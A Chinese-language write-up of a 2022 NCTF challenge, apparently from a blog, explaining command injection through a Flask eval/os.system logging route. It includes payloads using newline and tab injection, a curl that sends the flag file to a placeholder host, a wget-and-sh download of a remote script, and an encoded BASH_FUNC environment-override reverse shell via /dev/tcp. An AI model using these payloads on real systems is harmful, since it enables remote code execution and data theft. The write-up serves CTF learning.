是真的菜

开始复现把

calc

访问之后获得源码



    @app.route("/calc",methods=['GET'])

def calc():

    ip = request.remote_addr

    num = request.values.get("num")

    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)

    if waf(num):

        try:

            data = eval(num)

            os.system(log)

        except:

            pass

        return str(data)

    else:

        return "waf!!"

可以看到 它定义了一个 clac路由 然后get的方式接受了一个num的参数

然后经过了 waf 最终 执行os.system (log)

这里我们可以传入 %27%27%27111%0als%09/%0a%27%27%27

返回

我们输入%27%27%27%27%27%27的目的是 不上上面的eval 报错

在py里面 三个引号表示一个字符串 所以 在 eval(num)这里不会报错的 (不过我不知道为什么我在我本地试是会报错的)

但是在远程是可以继续往下去执行的 要不然也不会去返回结果

return 实在 eval后面的所以 意思就是题目环境是没有什么问题的

然后 漏洞的真正的利用点是 os.system(log)

看看 log是怎么来的

log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S" ,time.localtime()) ,ip ,num)

我们可控的点 就是 这个 nun 然后 会执行 os.system 这个函数 就是 直接可以执行系统命令 然后 由于上面 是 echo 然后我们可以随便 在 num这里写上 换行符 url编码之后就是 %0a 这样 前面所有拼接的 就被当成第一行 系统命令去执行了 然后 经过换行之后 执行第二行的系统命令 因为这里是 echo 命令 所以后面只添加一些字符串的 话是不会报错的 可以继续往下去执行 然后 由于空格被 过滤了 我们可以使用 tab键来代替空格 url编码是%09 然后 在 完成我们想要执行的额命令之后 后面 只需要拼接上 %0a 就可以继续换行执行下一行命令了

然后 具体执行什么命令呢

可以post发包

curl http://xxxxx:2333 -d @/Th1s_is__F1114g

%27%27%271%27%0awget%09-O%09./tmp/test5.txt%09http://xxxxxx/test11.txt%09%0a%273%27%27%27


%27%27%271%27%0Ash%09./tmp/test5.txt%0A%272%27%27%27

刚刚这个是非预期

后来github上发了源码 然后就出现了官方wp

如何修复非预期的呢 就是官方wp是通过变量覆盖 环境变量的

怎么覆盖 环境变量呢 由于过滤了 = 在python 中 可以用for 循环来覆盖变量

有因为过滤了空格 就可以用%09或者 这里利用python的特性 可以直接用[]来绕过空格

os.environ['BASH_FUNC_echo%%']='() { id; }'

覆盖这个环境变量就可以执行命令了 id就是我们想要执行的命令了

exp

[[str][0]for[%EF%BD%8Fs.environ[%27\x0\x42\x0\x41\x0\x53\x0\x48\x0\x5f\x0\x46\x0\x55\x0\x4e\x0\x43\x0\x5f\x0\x65\x0\x63\x0\x68\x0\x6f\x0\x25\x0\x25\x0\x7\x0\x0\x0\x27\x0\x28\x0\x29\x0\x20\x0\x7b\x0\x20\x0\x62\x0\x61\x0\x73\x0\x68\x0\x20\x0\x2d\x0\x69\x0\x20\x0\x3e\x0\x26\x0\x20\x0\x2f\x0\x64\x0\x65\x0\x76\x0\x2f\x0\x74\x0\x63\x0\x70\x0\x2f\x0\x78\x78\x78\x78\x78\x2f\x0\x32\x0\x33\x0\x33\x0\x33\x0\x20\x0\x30\x0\x3e\x0\x26\x0\x31\x0\x3b\x0\x20\x0\x7d%27]]]

2022NCTF的更多相关文章

随机推荐

  1. 栈——stack的用法

    介绍 栈(stack)又名堆栈,它是一种运算受限的线性表.限定仅在表尾进行插入和删除操作的线性表.这一端被称为栈顶,相对地,把另一端称为栈底.向一个栈插入新元素又称作进栈.入栈或压栈,它是把新元素放到 ...

  2. JZOJ 3234. 阴阳

    阴阳 题面 分析 个人认为是极好的题,很容易写 如果你学点分治是无奈背板的,那就做做这道题,加深你对点分治的理解 一般的,处理树上大规模统计问题,我们分治的关键是找一棵子树的重心 找到分治中心,即新一 ...

  3. 推荐一个Dapper扩展CRUD基本操作的开源库

    在C#众多ORM框架中,Dapper绝对称得上微型ORM之王,Dapper以灵活.性能好而著名,同样也是支持各种数据库,但是对于一些复杂的查询,我们写原生的SQL语句问题不大,对于CRUD基本操作,我 ...

  4. window 运行 jar包方式

    所有文件 1.将jar包指定为bat批处理文件,然后可以双击启动 新建start2.txt 编辑保存一下内容,修改start2.txt后缀为bat,点击运行(此方法当前命令窗口关闭后,程序也关闭) j ...

  5. MATH026th: 《矩斋筹算丛刻》

    矩斋筹算丛刻 (清)劳乃宣辑 清光绪刻朱墨套印本 2函22册竹纸线装 提要:内含 <古筹算考释>.<古筹算考释续编>.<筹算浅释>.<筹算分法浅释>.& ...

  6. Jmix- 业务系统高效开发的少代码平台

    企业在数字化转型的过程中,都面临将现有的业务流程进行"软件化"的过程.然而,在我们的印象中,通常会觉得针对业务系统的软件开发不是特别高效.这背后有很多原因,从开发角度看,有一个主要 ...

  7. 单兵 Web 快速开发框架!

    Jmix 是低代码? 自从 Jmix 2018 年在中国推广以来(那时叫 CUBA 平台),很多开发者会在使用之前询问我们,Jmix 是不是低代码,扩展性怎么样? 低代码应用程序平台(LCAP)是当今 ...

  8. PKU2506Tiling

    https://blog.csdn.net/Harington/article/details/86612106

  9. linux 操作命令大全

    mysql 授权远程访问 1.进入cd /usr/local/mysql/bin 下执行 ./mysql -uroot -pInfosec@2020  (-p后面是数据库密码) 2.use mysql ...

  10. C# DevExpress GridControl中BandedGridView表格使用

    1.设计器方式创建 1.点击"Change view">>然后在选中"Convert to"选项>>最后选中点击"Banded ...